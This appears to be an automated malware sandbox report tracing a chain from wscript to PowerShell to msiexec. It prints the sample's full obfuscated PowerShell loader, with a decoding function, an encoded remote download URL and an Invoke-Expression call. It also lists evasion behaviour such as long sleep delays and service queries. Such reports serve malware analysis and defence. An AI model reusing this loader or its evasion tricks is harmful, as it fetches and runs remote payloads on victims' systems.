L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 12_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3455A530 push eax; iretd 2_2_00007FFD3455A539
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04ED2F05 push esp; retn 07D9h 4_2_04ED3631
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_23592806 push ecx; ret 9_2_23592819
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044693D push ecx; ret 12_2_0044694D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00451D54 push eax; ret 12_2_00451D61
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00451D34 push eax; ret 13_2_00451D41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00444E71 push ecx; ret 13_2_00444E81
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00414060 push eax; ret 14_2_00414074
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00414060 push eax; ret 14_2_0041409C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00414039 push ecx; ret 14_2_00414049
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 13_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select *from Win32_Service
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 12_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4966 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4876 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6319 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3465 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 9.2 %
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.3 %
Source: C:\Windows\System32\wscript.exe TID: 1112 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5396 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5512 Thread sleep count: 1288 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5512 Thread sleep time: -3864000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5512 Thread sleep count: 8697 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5512 Thread sleep time: -26091000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_235910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_235910F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_23596580 FindFirstFileExA, 9_2_23596580
